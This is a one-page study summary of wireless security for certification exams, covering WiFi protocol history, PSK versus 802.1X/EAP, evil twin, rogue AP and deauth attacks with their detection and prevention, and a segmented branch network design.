Key Takeaways: Wireless Security

A one-page reference. Reread before an exam or before moving on. Dense by design.

The one idea

Wireless removes the cable's physical access control — the network leaves the building. Assume the medium is observed and writable by an unauthenticated attacker. Therefore: encrypt everything, authenticate strongly, segment ruthlessly. Segmentation is the keystone — it makes wireless compromise survivable when every other control fails.

WiFi protocol evolution (memorize this table)

Protocol Year Cipher Personal handshake Verdict / on-sight rule
WEP 1997 RC4 + 24-bit IV static key BROKEN — key recovered from traffic in minutes; passphrase length irrelevant. Critical finding; remove.
WPA 2003 RC4 + TKIP PSK (4-way) DEPRECATED — stopgap on a weak cipher. Treat as near-WEP. Finding.
WPA2 2004 AES-CCMP PSK (4-way) OK if patched — AES is sound; PSK is offline-guessable, so passphrase strength is everything.
WPA3 2018 AES + SAE SAE (Dragonfly) PREFERRED — resists offline guessing; forward secrecy; Enhanced Open; mandates PMF.

Decision rule: WPA3 if you can → WPA2-AES with a long random passphrase if you must → never WPA/WEP.

  • WEP dies of IV reuse (24-bit IV repeats → key leaks). Not a passphrase problem; cannot be fixed by a longer key.
  • WPA2-Personal dies of offline guessing: capture the 4-way handshake (passively, or force it with a deauth) → guess passphrase offline → security ≈ passphrase strength + secrecy.
  • WPA3-Personal (SAE) fix: captured handshake can't be brute-forced offline; each guess needs a live, rate-limited, detectable exchange. Adds forward secrecy.
  • KRACK (2017, WPA2) and Dragonblood (2019, WPA3) = implementation bugs, fixed by patches → patch wireless infrastructure and clients.

PSK vs. Enterprise (the scale decision)

WPA2/3-Personal (PSK) WPA-Enterprise (802.1X/EAP)
Secret one shared passphrase per-user credential (password or certificate)
Revoke one user re-key everyone (so it never happens) disable in directory once
Who connected? unknown (one identity) logged per user
Leak risk sticky-note / shouted to customers none shared to leak
VLAN assignment static per-user at connect time (via RADIUS)
Use for homes, tiny sites anything that matters

802.1X roles: supplicant (device) → authenticator (AP/switch = gatekeeper, blocks all traffic until OK) → authentication server (RADIUS + AD/Entra = makes the decision). EAP = an extensible container for auth methods; RADIUS carries it to the server.

EAP methods

Method User presents Server presents Cost Risk
EAP-TLS (gold) client certificate server certificate needs PKI/cert per device none to phish — credential is a private key
PEAP / EAP-TTLS password (in TLS tunnel) server certificate easy (uses AD password) evil twin harvests password if server-cert validation is OFF

Rule: EAP-TLS where devices are managed; PEAP only with rigorously enforced, pinned server-cert validation. PEAP-with-validation-off = credential-harvesting trap (and the harvested AD password works for email/VPN too).

Wireless attacks → detection → prevention

Attack What it is Detect (WIDS) Prevent
Rogue AP unauthorized AP on your network (a doorway inside) unknown BSSID bridged to your wire → CRITICAL jack hygiene; WIDS; disable unused ports
Evil twin rogue AP impersonating your SSID to lure devices your SSID from a BSSID not on the allowlist → HIGH WPA3/EAP-TLS; BSSID monitoring
Deauth attack forges unauthenticated mgmt frames to disconnect clients spike in deauth frames (leading indicator) 802.11w / PMF (mandatory in WPA3)
Handshake capture grab 4-way handshake for offline crack (passive — not detectable) strong passphrase; better: abandon PSK
  • Rogue AP ≠ evil twin: rogue AP defined by network connection; evil twin defined by impersonation. Often combined.
  • Deauth is a lever, not the goal: forces reconnect → enables handshake capture + evil-twin luring. PMF kills it.
  • You can't stop transmission in a parking lot → detect fast (WIDS) + contain (segment).

Bluetooth & NFC (proportionate, not panic)

Range Real risk Controls
Bluetooth ~10 m BlueBorne-class bugs compromise unpaired devices in range; weak/forgotten peripherals (keyboards, card readers) patch; disable when unused; not discoverable; inventory; modern ("Secure Connections") pairing
NFC ~cm contactless payments use one-time cryptograms (skimming yields little); legacy access badges clonable keep terminals current/tamper-evident; modern cryptographic badges

Meridian branch wireless design (the §8.6 architecture)

Staff  → WPA3-Enterprise (802.1X/EAP-TLS) → VLAN 10 → internal apps (least priv)
Guest  → WPA3 Enhanced Open + captive portal + client isolation → VLAN 90 → INTERNET ONLY, deny all internal
Ops/IoT→ WPA3-Personal (strong unique PSK) → VLAN 50 → deny internet, deny staff/guest
+ 802.11w/PMF everywhere · WIDS across branches · DEFAULT-DENY between all segments
  • The firewall rules between segments are the security; SSIDs/VLANs are just labels. DENY guest → staff is the line that protects the tellers.
  • Audit enforcement, not configuration — the dangerous window is when VLAN is changed but the firewall rule isn't.

Certification crosswalk

Concept CompTIA Security+ (ISC)² CISSP domain
WEP/WPA/WPA2/WPA3, ciphers 1.0 / 3.0 / 4.0 (secure protocols & wireless) Communication & Network Security
PSK vs. Enterprise, 802.1X, EAP, RADIUS 1.0; 4.0 Operations Identity & Access Mgmt; Network Security
Evil twin, rogue AP, deauth, jamming 2.0 Threats, Vulnerabilities & Mitigations Security Operations; Network Security
WIDS / wireless monitoring 4.0 Security Operations Security Operations
Bluetooth / NFC exposure 2.0; 3.0 Communication & Network Security
Segmentation as a wireless control 3.0 Security Architecture Security Architecture & Engineering

Project additions this chapter

  • Meridian program: the wireless policy (protocols permitted/prohibited; staff = WPA-Enterprise/EAP-TLS; guest isolated; IoT segmented; PMF required; WIDS required; rogue APs prohibited) — joins the Ch.6–7 network architecture.
  • bluekit toolkit: wifiaudit.pyassess_wifi(cfg) grades one wireless config against the policy (weak protocol, short PSK, staff-not-Enterprise, EAP-without-cert-validation, guest-not-isolated, PMF-off).

Common pitfalls

  • Thinking a long WEP key helps (the break is in the protocol, not the passphrase).
  • Hiding the SSID as a "security control" (it's broadcast in cleartext; stops only casual users, breaks some clients).
  • Deploying PEAP and assuming it's safe without enforcing server-certificate validation.
  • Treating guest WiFi as harmless — it's safe only if genuinely isolated; one convenience allow-rule breaks it.
  • Calling a rogue AP harmless because it's not malicious (it's still an unauthenticated bridge inside).
  • Auditing the wireless config but not the firewall rules that actually enforce isolation.
  • Forgetting that wireless gear needs patching (KRACK, Dragonblood, BlueBorne).